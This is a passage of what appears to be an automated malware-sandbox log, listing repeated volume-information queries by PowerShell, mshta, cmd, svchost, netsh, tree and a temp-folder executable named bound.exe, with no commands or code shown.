              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\bound.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
